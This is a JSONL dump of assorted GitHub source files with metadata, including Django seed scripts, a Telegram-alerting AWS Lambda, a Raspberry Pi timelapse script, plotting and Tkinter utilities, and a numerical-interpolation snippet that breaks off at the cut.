+{"seq_id":"18939777306","text":"class funString():\n\n    def __init__(self, str1, str2):\n        self.string1 = str1\n        self.mode = str2\n\n    def __str__(self):\n        pass\n\n    def size(self):\n        return len(self.string1)\n\n    def changeSize(self):\n        i = 0\n        ch2 = \"\"\n        while self.string1[i:]:\n            ch = ord(self.string1[i])\n            if ch > 64 and ch < 91:\n                ch2 += chr(ch+32)\n            elif ch > 96 and ch < 123:\n                ch2 += chr(ch-32)\n            else:\n                ch2 += chr(ch)\n            i += 1\n        return ch2\n\n    def reverse(self):\n        return self.string1[::-1]\n\n    def deleteSame(self):\n        ans = []\n        emt = [i for i in self.string1]\n        emt.sort()\n        for i in emt:\n            if i not in ans:\n                ans.append(i)\n        return \"\".join(ans)\n\n\nstr1, str2 = input(\"Enter String and Number of Function : \").split()\n\nres = funString(str1, str2)\n\nif str2 == \"1\" : print(res.size())\n\nelif str2 == \"2\": print(res.changeSize())\n\nelif str2 == \"3\" : print(res.reverse())\n\nelif str2 == \"4\" : print(res.deleteSame())","repo_name":"chanathipjjj444/OOD","sub_path":"ch2/funString.py","file_name":"funString.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"36001855572","text":"# media_bundler/conf/bundler_settings.py\n\n\"\"\"\nmedia_bundler specific settings with the defaults filled in.\n\nIf the user has overridden a setting in their settings module, we'll use that\nvalue, but otherwise we'll fall back on the value from\nmedia_bundler.default_settings. 
All bundler-specific settings checks should\ngo through this module, but to check global Django settings, use the normal\ndjango.conf.settings module.\n\"\"\"\n\nfrom django.conf import settings\n\nfrom media_bundler.conf import default_settings\n\n\nUSE_BUNDLES = getattr(settings, \"USE_BUNDLES\",\n                       default_settings.USE_BUNDLES)\nDEFER_JAVASCRIPT = getattr(settings, \"DEFER_JAVASCRIPT\",\n                           default_settings.DEFER_JAVASCRIPT)\nMEDIA_BUNDLES = getattr(settings, \"MEDIA_BUNDLES\",\n                        default_settings.MEDIA_BUNDLES)\nBUNDLE_VERSION_FILE = getattr(settings, \"BUNDLE_VERSION_FILE\",\n                              default_settings.BUNDLE_VERSION_FILE)\nBUNDLE_VERSIONER = getattr(settings, \"BUNDLE_VERSIONER\",\n                           default_settings.BUNDLE_VERSIONER)\n","repo_name":"rnk/django-media-bundler","sub_path":"media_bundler/conf/bundler_settings.py","file_name":"bundler_settings.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"48"}
+{"seq_id":"73219952466","text":"from photoboo.PhotoBooManager import PhotoBooManager\nimport time\n\nimport cv2  # used by cv2.imread below but missing from the original imports\n\n# image_filepath = \"beatles.jpg\"\nimage_filepath = \"original_1571629730.jpg\"\n# image_filepath = \"adonis-moustache.jpg\"\n\nphoto_boo = PhotoBooManager()\n\ntimestamp = round(time.time())\nprint(\"ghosting...\")\nimage = photo_boo.ghostify(cv2.imread(image_filepath, cv2.IMREAD_GRAYSCALE), timestamp)\nprint(\"took {} seconds to ghost\".format(round(time.time()) - timestamp))\n\nprint(image)","repo_name":"glitch003/photoboo","sub_path":"camera/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"32042353112","text":"import json\nimport os\nimport requests\nimport boto3\n\n\ndef obter_arquivo_mais_recente(nome_s3, nome_bucket):\n    s3 = boto3.client('s3')\n    response = s3.list_objects_v2(Bucket=nome_bucket)\n    objetos = response['Contents']\n    objetos_ordenados = sorted(objetos, key=lambda x: x['LastModified'], reverse=True)\n    nome_arquivo_mais_recente = objetos_ordenados[0]['Key']\n    obj = s3.get_object(Bucket=nome_bucket, Key=nome_arquivo_mais_recente)\n    body = obj['Body'].read().decode()\n    return nome_arquivo_mais_recente, body\n\n\n\ndef porcentagem(conteudo_arquivo):\n    linhas = conteudo_arquivo.strip().split('\\n')\n    soma_confidence = 0.0\n    soma_confidence_gun = 0.0\n\n    for linha in linhas[1:]:  # start at index 1 to skip the header\n        valores = linha.split(';')  # use ';' as the separator\n        if len(valores) >= 5:  # check that the line has at least 5 columns (the confidence column)\n            confidence_str = valores[4]\n            name = valores[6].lower()  # convert to lowercase\n\n            try:\n                confidence = round(float(confidence_str) * 100) / 100\n                print(f\"Valor lido e convertido: {confidence:.2f}\")\n\n                if name == 'gun':\n                    print(f\"Nome da classe: {name}\")\n                    print(f\"Valor de confidence 'gun' antes da adição de 10: {confidence_str}\")\n                    confidence_gun = float(confidence_str) * 2\n                    print(f\"Valor de confidence 'gun' após a adição de 10: {confidence_gun}\")\n                    soma_confidence_gun += confidence_gun\n                else:\n                    soma_confidence += confidence\n\n            except ValueError:\n                print(f\"Não foi possível converter o valor de confidence: {confidence_str}\")\n\n    print(f\"Resultado da soma (confiança normal): {soma_confidence:.2f}\")\n    print(f\"Resultado da soma (confiança gun): {soma_confidence_gun:.2f}\")\n\n    somafinal = (soma_confidence + soma_confidence_gun) * 100 / 4\n    return round(somafinal, 2)  # round the sum to two decimal places\n\n\n\ndef last_chat_id(token):\n    try:\n        url = \"https://api.telegram.org/bot{}/getUpdates\".format(token)\n        response = requests.get(url)\n        if response.status_code == 200:\n            json_msg = response.json()\n            for json_result in reversed(json_msg['result']):\n                message_keys = json_result['message'].keys()\n                if ('chat' in message_keys) or ('group_chat_created' in message_keys):\n                    return json_result['message']['chat']['id']\n            print('Nenhum grupo encontrado')\n        else:\n            print('A resposta falhou, código de status: {}'.format(response.status_code))\n    except Exception as e:\n        print(\"Erro no getUpdates:\", e)\n\n\ndef send_message(token, chat_id, message):\n    try:\n        data = {\"chat_id\": chat_id, \"text\": message}\n        url = \"https://api.telegram.org/bot{}/sendMessage\".format(token)\n        requests.post(url, data)\n    except Exception as e:\n        print(\"Erro no sendMessage:\", e)\n\n\ndef mover_arquivo(nome_s3, nome_bucket_origem, nome_bucket_destino):\n    s3 = boto3.client('s3')\n\n    nome_arquivo, conteudo_arquivo = obter_arquivo_mais_recente(nome_s3, nome_bucket_origem)\n\n    s3.copy_object(\n        Bucket=nome_bucket_destino,\n        CopySource={'Bucket': nome_bucket_origem, 'Key': nome_arquivo},\n        Key=nome_arquivo\n    )\n\n    s3.delete_object(\n        Bucket=nome_bucket_origem,\n        Key=nome_arquivo\n    )\n\n    return nome_arquivo, conteudo_arquivo\n\n\ndef lambda_handler(event, context):\n\n    # settings\n    nome_s3 = \"\"\n    nome_bucket_origem = \"\"\n    nome_bucket_destino = \"\"\n    token = os.environ.get('TOKEN')  # Lambda environment variable\n\n    try:\n        nome_arquivo, conteudo_arquivo = mover_arquivo(nome_s3, nome_bucket_origem, nome_bucket_destino)\n        print(conteudo_arquivo)\n\n        chat_id = last_chat_id(token)\n        print(\"Id do chat:\", chat_id)\n\n        alerta_assalto = porcentagem(conteudo_arquivo)\n        mensagem = \"⚠!!!CUIDADO!!!⚠\\nALERTA DE ASSALTO COM {}% DE CHANCE\".format(alerta_assalto)\n\n        send_message(token, chat_id, mensagem)\n\n        return {\n            'statusCode': 200,\n            'body': json.dumps('Mensagem enviada e arquivo movido com sucesso.')\n        }\n    except Exception as e:\n        return {\n            'statusCode': 500,\n            'body': json.dumps(f'Erro na execução da função lambda: {str(e)}')\n        }\n\n","repo_name":"Aleyucra74/TCC-CCO-2023","sub_path":"Lambda/Alert/lambdaFuction_Alert.py","file_name":"lambdaFuction_Alert.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"11002579983","text":"import argparse\nimport os \nimport os.path as osp\nimport time\nimport numpy as np \nfrom sklearn.metrics import confusion_matrix\n\nimport sys\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(parent_dir)\nsys.path.append('.')\n\nfrom engine.single_tester import SingleTester\nfrom engine.registration_evaluator import RegistrationEvaluator\nfrom utils import torch_util\nfrom aligner.sg_aligner import *\nfrom datasets.loaders import get_val_dataloader\nfrom configs import config, update_config\nfrom utils import common, scan3r, alignment\n\nclass AlignerOverlapper(SingleTester):\n    def __init__(self, cfg, parser):\n        super().__init__(cfg, parser=parser)\n\n        self.run_reg = cfg.registration\n\n        # Model Specific params\n        self.modules = cfg.modules\n        self.rel_dim = cfg.model.rel_dim\n        self.attr_dim = cfg.model.attr_dim\n\n        # Metrics params\n        self.alignment_thresh = cfg.model.alignment_thresh\n        self.corr_score_thresh = cfg.reg_model.corr_score_thresh\n\n        self.aligner_overlapper_data = {'true' : [], 'pred' : 
[]}\n self.registration_overlapper_data = {'true' : [], 'pred' : []}\n\n # dataloader\n start_time = time.time()\n dataset, data_loader = get_val_dataloader(cfg)\n loading_time = time.time() - start_time\n message = f'Data loader created: {loading_time:.3f}s collapsed.'\n self.logger.info(message)\n\n self.register_loader(data_loader)\n self.register_dataset(dataset)\n\n # model \n model = self.create_model()\n self.register_model(model)\n self.model.eval()\n\n # Registration\n self.reg_k = cfg.reg_model.K\n reg_snapshot = self.args.reg_snapshot\n self.registration_evaluator = RegistrationEvaluator(self.device, cfg, reg_snapshot, self.logger)\n\n def create_model(self):\n model = MultiModalEncoder(modules = self.modules, rel_dim = self.rel_dim, attr_dim=self.attr_dim).to(self.device)\n message = 'Model created'\n self.logger.info(message)\n return model\n \n def test_step(self, iteration, data_dict):\n output_dict = self.model(data_dict)\n return output_dict\n \n def print_metrics(self, results_dict):\n for key in results_dict.keys():\n metrics_dict = self.compute_precision_recall(results_dict[key])\n message = common.get_log_string(result_dict=metrics_dict, name=key, timer=self.timer)\n self.logger.critical(message)\n\n def compute_precision_recall(self, result_dict):\n tn, fp, fn, tp = confusion_matrix(result_dict['true'], result_dict['pred'], labels=[0, 1]).ravel()\n precision = round(tp / (tp + fp), 4)\n recall = round(tp / (tp + fn), 4)\n f1_score = round(2 * (precision * recall)/ (precision + recall), 4)\n metrics_dict = {'precision' : precision, 'recall' : recall, 'f1_score' : f1_score}\n\n return metrics_dict\n \n def eval_step(self, iteration, data_dict, output_dict):\n obj_cnt_start_idx = 0\n data_dict = torch_util.release_cuda(data_dict)\n embedding = output_dict['joint'] if len(self.modules) > 1 else output_dict[self.modules[0]]\n\n for batch_idx in range(self.test_loader.batch_size):\n src_objects_count = data_dict['graph_per_obj_count'][batch_idx][0]\n ref_objects_count = data_dict['graph_per_obj_count'][batch_idx][1]\n overlap = data_dict['overlap'][batch_idx]\n obj_cnt_end_idx = obj_cnt_start_idx + data_dict['tot_obj_count'][batch_idx]\n pcl_center = data_dict['pcl_center'][batch_idx]\n\n embedding_batch_idx = embedding[obj_cnt_start_idx : obj_cnt_end_idx]\n embedding_batch_idx /= embedding_batch_idx.norm(dim=1)[:, None]\n dist = 1 - torch.mm(embedding_batch_idx, embedding_batch_idx.transpose(0, 1))\n rank_list = torch.argsort(dist, dim=1)\n \n # Load subscene points\n src_scan_id = data_dict['scene_ids'][batch_idx][0]\n ref_scan_id = data_dict['scene_ids'][batch_idx][1]\n\n src_points = scan3r.load_plydata_npy(osp.join(self.test_dataset.subscans_scenes_dir, src_scan_id, 'data.npy'), obj_ids=None, return_ply_data=False)\n ref_points = scan3r.load_plydata_npy(osp.join(self.test_dataset.subscans_scenes_dir, ref_scan_id, 'data.npy'), obj_ids=None, return_ply_data=False)\n\n reg_data_dict = dict()\n reg_data_dict['src_points'] = src_points - pcl_center\n reg_data_dict['ref_points'] = ref_points - pcl_center\n reg_data_dict['gt_transform'] = np.eye(4)\n corr_score = self.registration_evaluator.run_normal_registration(reg_data_dict, evaluate_registration=False)\n\n if corr_score is not None:\n alignment_score = alignment.compute_alignment_score(rank_list, src_objects_count, ref_objects_count)\n \n self.registration_overlapper_data['pred'].append(1.0 if corr_score > self.corr_score_thresh else 0.0)\n self.registration_overlapper_data['true'].append(1.0 if overlap > 0.0 else 0.0)\n 
\n self.aligner_overlapper_data['pred'].append(1.0 if alignment_score > self.alignment_thresh else 0.0)\n self.aligner_overlapper_data['true'].append(1.0 if overlap > 0.0 else 0.0)\n \n obj_cnt_start_idx = obj_cnt_end_idx\n \n return { 'aligner_overlapper_data' : self.aligner_overlapper_data, 'registration_overlapper_data' : self.registration_overlapper_data}\n\ndef parse_args(parser=None):\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', dest='config', default='', type=str, help='configuration file name')\n parser.add_argument('--snapshot', default=None, help='load from snapshot')\n parser.add_argument('--test_epoch', type=int, default=None, help='test epoch')\n parser.add_argument('--test_iter', type=int, default=None, help='test iteration')\n parser.add_argument('--reg_snapshot', default=None, help='load from snapshot')\n\n args = parser.parse_args()\n return parser, args\n \ndef main():\n parser, args = parse_args()\n cfg = update_config(config, args.config)\n tester = AlignerOverlapper(cfg, parser)\n tester.run()\n\nif __name__ == '__main__':\n main()","repo_name":"sayands/sgaligner","sub_path":"src/inference/sgaligner/inference_find_overlapper.py","file_name":"inference_find_overlapper.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"37407907889","text":"from django.contrib.auth import get_user_model\nfrom faker import Faker\nfrom random import randint, choice, sample\nfrom .models import *\nimport psycopg2\n\n\nclass CategorySeed:\n\n model = Category\n\n @classmethod\n def seed(cls, **kwargs):\n \n default_categories = [\n {\n 'name': 'Desarrollo', \n 'icon_class': 'development', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n {\n 'name': 'Marketing', \n 'icon_class': 'marketing', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n {\n 'name': 'Diseño gráfico', \n 'icon_class': 'graphic-design', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n ]\n\n result = []\n\n for item in default_categories:\n category = cls.model.objects.create(**item)\n result.append(category)\n\n return result\n\nclass SubCategorySeed:\n\n model = SubCategory\n category_model = Category\n\n @classmethod\n def seed(cls, **kwargs):\n fake = Faker()\n result = []\n\n for _ in range(0, randint(10, 15)):\n name = fake.text(max_nb_chars=randint(15, 25))\n description = fake.text(max_nb_chars=randint(15, 25))\n categories = cls.category_model.objects.all()\n\n data = {\n \"name\": name,\n \"parent\": choice(categories),\n \"description\": description,\n }\n\n result.append(cls.model.objects.create(**data))\n\n return result\n\nclass LanguageSeed:\n\n model = Language\n\n @classmethod\n def seed(cls, **kwargs):\n default_languages = [\n {\n 'name': 'Español',\n },\n {\n 'name': 'Ingles',\n },\n ]\n\n result = []\n\n for item in default_languages:\n result.append(cls.model.objects.create(**item))\n\n return result\n\nclass GroupSeed:\n\n model = Group\n category_model = Category\n sub_category_model = SubCategory\n tag_model = Tag\n language_model = Language\n user_model = get_user_model()\n\n @classmethod\n def populate(cls, group):\n users = cls.user_model.objects.filter(user_type='student')\n users = sample(list(users), randint(1, len(users)))\n\n group.following.add(*users)\n group.save()\n\n return group\n\n\n @classmethod\n def seed(cls, **kwargs):\n fake = Faker()\n result = 
[]\n\n        for _ in range(0, randint(10, 20)):\n            title = fake.paragraph(nb_sentences=2)\n            description = fake.paragraph(nb_sentences=7)\n            short_description = fake.paragraph(nb_sentences=2)\n            categories = cls.category_model.objects.all()\n            sub_categories = cls.sub_category_model.objects.all()\n            # tags = cls.tag_model.objects.all()\n            languages = cls.language_model.objects.all()\n            users = cls.user_model.objects.filter(user_type='leader')\n            status = ['active','paused']\n\n            data = {\n                \"title\": title,\n                \"user\": choice(users),\n                \"description\": description,\n                \"short_description\": short_description,\n                \"category\": choice(categories),\n                \"sub_category\": choice(sub_categories),\n                \"language\": choice(languages),\n                \"status\": choice(status),\n            }\n\n            try:\n                print('Predata', data)\n                group = cls.model.objects.create(**data)\n                group = cls.populate(group)\n\n                result.append(group)\n            except Exception as e:\n                print(e, data)\n\n        return result\n\nclass LessonSeed:\n\n    model = Lesson\n    group_model = Group\n    user_model = get_user_model()\n\n    @classmethod\n    def populate(cls, lesson):\n\n        users = cls.user_model.objects.order_by(\"?\")\n        users = users[:randint(1, len(users))]\n\n        lesson.booking.add(*users)\n        lesson.save()\n\n        return lesson\n\n\n    @classmethod\n    def seed(cls, **kwargs):\n        fake = Faker()\n        result = []\n\n        for group in cls.group_model.objects.all():\n            for _ in range(0, randint(1, 20)):\n                title = fake.paragraph(nb_sentences=2)\n                description = fake.paragraph(nb_sentences=7)\n                short_description = fake.paragraph(nb_sentences=2)\n                status = ['active','paused']\n                start_date = fake.date_time_this_month(before_now=True, after_now=True)\n\n                data = {\n                    \"group\": group,\n                    \"title\": title,\n                    \"user\": group.user,\n                    \"description\": description,\n                    \"short_description\": short_description,\n                    \"is_privated\": choice([True, False]),\n                    \"url\": \"https://example.com\",\n                    \"status\": choice(status),\n                    \"start_date\": start_date,\n                }\n\n                try:\n                    print('Predata', data)\n                    lesson = cls.model.objects.create(**data)\n                    lesson = cls.populate(lesson)\n\n                    result.append(lesson)\n                except Exception as e:\n                    print(e, data)\n\n        return result\n","repo_name":"crisyelit/fitness-tracking-partner-master","sub_path":"apps/training/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"9518622733","text":"class Number:\n    def __init__(self, num, den=1):\n        self.num = num\n        self.den = den\n\n    def __str__(self):\n        if self.num % self.den == 0:\n            return str(self.num // self.den)\n        else:\n            return \"%d/%d\" % (self.num, self.den)\n\n\nx = Number(5)\nprint(x)","repo_name":"randint/capybara","sub_path":"python/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"8624988450","text":"#!/usr/bin/env python3\n\nimport requests\n\n\ndef getHTMLText(url):\n\ttry:\n\t\tr = requests.get(url, timeout=30)\n\t\tr.raise_for_status()\n\t\tr.encoding = r.apparent_encoding\n\t\tprint(r.text)\n\t\treturn r.text\n\texcept:\n\t\treturn \"request error\"\n\n\nif __name__ == '__main__':\n\turl = \"http://www.baidu.com\"\n\tprint(getHTMLText(url))\n# r = requests.get(\"http://www.baidu.com\")\n# r.raise_for_status\n# r.encoding=r.apparent_encoding\n# 
print(r.text)","repo_name":"lennon25/python_language_programming","sub_path":"web_crawlers/request_framework.py","file_name":"request_framework.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21965551245","text":"import logging\nimport os\nfrom time import sleep\nfrom datetime import datetime, timedelta\nimport pytz\nfrom astral import Astral\nimport picamera\n\ndef wait(ts_compare):\n '''\n Calculate the delay to the start of the specifict timestamp\n '''\n #ts = ts.replace(tzinfo=None)\n if ts_compare <= datetime.now(ACT_TZ):\n return\n\n delay = (ts_compare - datetime.now(ACT_TZ)).seconds\n sleep(delay)\n\ntry:\n ACT_TZ = pytz.timezone('Europe/Prague')\n TARGET_PATH = \"/mnt/remotenfs\"\n OUT_PATH = os.path.join(TARGET_PATH, datetime.now(ACT_TZ).strftime('%Y_%m_%d'))\n\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d.%m.%y %H:%M:%S',\n filename=TARGET_PATH + '/' + datetime.now().strftime(\"%Y%m%d\") + '.log')\n\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\n logging.info('Target folder: %s', OUT_PATH)\n\n if not os.path.isdir(OUT_PATH):\n os.makedirs(OUT_PATH)\n\n CITY_NAME = 'Prague'\n\n ASTRAL = Astral()\n ASTRAL.solar_depression = 'civil'\n\n CITY = ASTRAL[CITY_NAME]\n\n logging.info('Information for %s/%s', CITY_NAME, CITY.region)\n logging.info('Timezone: %s', CITY.timezone)\n logging.info('Latitude: %.02f; Longitude: %.02f', CITY.latitude, CITY.longitude)\n\n SUN = CITY.sun(date=datetime.now(), local=True)\n logging.info('Dawn: %s', str(SUN['dawn']))\n logging.info('Sunrise: %s', str(SUN['sunrise']))\n logging.info('Noon: %s', str(SUN['noon']))\n logging.info('Sunset: %s', str(SUN['sunset']))\n logging.info('Dusk: %s', str(SUN['dusk']))\n\n SUN_RISE = SUN['sunrise'].replace(microsecond=0, second=0, minute=0)+timedelta(hours=1)\n SUN_SET = SUN['sunset'].replace(microsecond=0, second=0, minute=0)\n\n logging.info('waiting to Sunrise ...')\n wait(SUN_RISE)\n logging.info('The sun is shining.')\n logging.info('Camera set up')\n\nexcept Exception:\n logging.exception(\"Init\")\n\ntry:\n with picamera.PiCamera(resolution=(1920, 1080), framerate=30) as camera:\n # Set ISO to the desired value\n camera.iso = 100\n sleep(2)\n camera.shutter_speed = camera.exposure_speed\n camera.exposure_mode = 'off'\n g = camera.awb_gains\n camera.awb_mode = 'off'\n camera.awb_gains = g\n camera.start_preview()\n sleep(2)\n logging.info(\"Let's go to make picture ...\")\n for filename in camera.capture_continuous(os.path.join(OUT_PATH, 'img{counter:04d}.jpg')):\n logging.info('Captured: %s', filename)\n sleep(300) # wait 5 minutes\n if SUN_SET <= datetime.now(ACT_TZ):\n break\nexcept Exception:\n logging.exception(\"Take a picture\")\n\ntry:\n logging.info('The dusk is coming ...')\n os.system(\"ffmpeg -r 10 -i \" + OUT_PATH + \"/img%04d.jpg -r 10 -vcodec libx264 -crf 20 -g 15 \" + OUT_PATH + \"/timelapse.mp4\")\n logging.info('Finish. 
Video was created.')\nexcept Exception:\n logging.exception(\"Make video\")\n","repo_name":"dejmekz/TimeLapse_Raspberry","sub_path":"timelapse.py","file_name":"timelapse.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3422133020","text":"import cufflinks as cf\nimport pandas as pd\nfrom IPython import get_ipython\nfrom auroraPSI.observation_plotter import ObservationPlotter\nfrom ipywidgets import interact, DatePicker\nfrom matplotlib import pyplot as plt\n\n\nclass PlotterAdapter(ObservationPlotter):\n\n def date_plot(self):\n interact(self._date_plot)\n\n def histogram_plot(self):\n interact(self._histogram_plot)\n\n def scatter_plot(self):\n interact(self._scatter_plot)\n\n def all_plot(self):\n ipython = get_ipython()\n ipython.magic(\"matplotlib widget\")\n plt.style.use(\"seaborn-whitegrid\")\n self._df[self._amus].plot()\n plt.legend(bbox_to_anchor=(1.04, 1.2), loc=\"upper left\")\n\n def all_error_plot(self):\n ipython = get_ipython()\n ipython.magic(\"matplotlib widget\")\n plt.style.use(\"seaborn-whitegrid\")\n self._df[self._err].plot()\n plt.legend(bbox_to_anchor=(1.04, 1.2), loc=\"upper left\")\n\n def __init__(self, observation_df: pd.DataFrame):\n self._df = observation_df.copy()\n cf.go_offline()\n\n self._scatter_plot = self._init_scatter_plot()\n self._date_plot = self._init_date_plot()\n self._histogram_plot = self._init_histogram_plot()\n self._amus = [column for column in self._df.columns if \"_err\" not in column]\n self._err = [column for column in self._df.columns if \"_err\" in column]\n\n def _init_scatter_plot(self):\n def _scatter_plot(x=list(self._df.columns),\n y=list(self._df.select_dtypes('number').columns)[1:],\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys())):\n self._df.iplot(kind='scatter', x=x, y=y, mode='markers',\n xTitle=x.title(), yTitle=y.title(),\n # text='title',\n title=f'{y.title()} vs {x.title()}',\n theme=theme, colorscale=colorscale)\n\n return _scatter_plot\n\n def _init_date_plot(self):\n def _date_plot(y=list(self._df.select_dtypes('number').columns)[1:],\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys()),\n start_date=DatePicker(\n description='Start Date',\n disabled=False,\n value=pd.to_datetime(self._df.index[0])\n ),\n end_date=DatePicker(\n description='End Date',\n disabled=False,\n value=pd.to_datetime(self._df.index[-1])\n )\n ):\n self._df.loc[pd.Timestamp(start_date):pd.Timestamp(end_date)] \\\n .iplot(kind='scatter', y=y, mode='markers', xTitle=\"date\", yTitle=y.title(),\n title=f'{y.title()}', theme=theme, colorscale=colorscale)\n\n return _date_plot\n\n def _init_histogram_plot(self):\n def _histogram_plot(x=list(self._df.select_dtypes('number').columns),\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys())):\n self._df[str(x)].iplot(kind='histogram',\n xTitle=x.title(),\n title=f'histogram {x.title()}',\n theme=theme, colorscale=colorscale)\n\n return _histogram_plot\n\n @property\n def data_frame(self):\n return self._df\n\n @data_frame.setter\n def data_frame(self, observation_df: pd.DataFrame):\n self._df = observation_df.copy()\n cf.go_offline()\n self._scatter_plot = self._init_scatter_plot()\n self._date_plot = self._init_date_plot()\n self._histogram_plot = 
self._init_histogram_plot()\n","repo_name":"daniel-trejobanos/aurora","sub_path":"src/python/auroraPSI/pandas_plotter_adapter.py","file_name":"pandas_plotter_adapter.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5228357726","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass ToggledFrame(tk.Frame):\n\n def __init__(self, parent, text=\"\", *args, **options):\n tk.Frame.__init__(self, parent, *args, **options)\n\n self.show = tk.IntVar()\n self.show.set(0)\n\n self.title_frame = ttk.Frame(self)\n self.title_frame.pack(fill=\"x\", expand=1)\n\n ttk.Label(self.title_frame, text=text).pack(side=\"left\", fill=\"x\", expand=1)\n\n self.toggle_button = ttk.Checkbutton(self.title_frame, width=2, text='+', command=self.toggle,\n variable=self.show, style='Toolbutton')\n self.toggle_button.pack(side=\"left\")\n\n self.sub_frame = tk.Frame(self, relief=\"sunken\", borderwidth=1)\n\n def toggle(self):\n if bool(self.show.get()):\n self.sub_frame.pack(fill=\"x\", expand=1)\n self.toggle_button.configure(text='-')\n else:\n self.sub_frame.forget()\n self.toggle_button.configure(text='+')\n\n\ndef create_dashboard():\n root = tk.Tk()\n root.title(\"The Title Goes Here\")\n #root.minsize(width=400, height=300)\n #root.maxsize(width=1200, height=900)\n\n root_label = tk.Label(root, text=\"The Label At The Top\")\n root_label.pack()\n\n t = ToggledFrame(root, text='Load Project', relief=\"raised\", borderwidth=1)\n t.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n # load .csv code\n\n t1 = ToggledFrame(root, text='Pie Charts', relief=\"raised\", borderwidth=1)\n t1.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n\n ttk.Label(t1.sub_frame, text='Pie Chart 1').pack(side=\"left\")\n ttk.Label(t1.sub_frame, text='Pie Chart 2').pack(side=\"right\")\n\n t2 = ToggledFrame(root, text='Data 1', relief=\"raised\", borderwidth=1)\n t2.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n\n ttk.Label(t2.sub_frame, text='Input field 1').grid(row=0,column=0)\n ttk.Entry(t2.sub_frame).grid(row=0,column=1)\n ttk.Label(t2.sub_frame, text='Input field 2').grid(row=0,column=2)\n ttk.Entry(t2.sub_frame).grid(row=0,column=3)\n ttk.Label(t2.sub_frame, text='Input field 3').grid(row=0,column=4)\n ttk.Entry(t2.sub_frame).grid(row=0,column=5)\n ttk.Label(t2.sub_frame, text='Input field 4').grid(row=1,column=0)\n ttk.Entry(t2.sub_frame).grid(row=1,column=1)\n ttk.Label(t2.sub_frame, text='Input field 5').grid(row=1,column=2)\n ttk.Entry(t2.sub_frame).grid(row=1,column=3)\n ttk.Label(t2.sub_frame, text='Input field 6').grid(row=1,column=4)\n ttk.Entry(t2.sub_frame).grid(row=1,column=5)\n\n t3 = ToggledFrame(root, text='Data 2', relief=\"raised\", borderwidth=1)\n t3.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n for i in range(3):\n ttk.Label(t3.sub_frame, text='Bar' + str(i)).pack()\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n create_dashboard()\n","repo_name":"NazarAmin/Dashboard","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72732926867","text":"import math\r\n\r\n\r\ndef u_cal(u, n):\r\n temp = u\r\n for i in range(1, n):\r\n temp = temp * (u - i)\r\n return temp\r\n\r\n\r\nn = int(input(\"Enter value for n : \"))\r\nx = [0] * n\r\ny = [[0 for i in range(n)] for j in range(n)]\r\n\r\n# for i in range(0, 
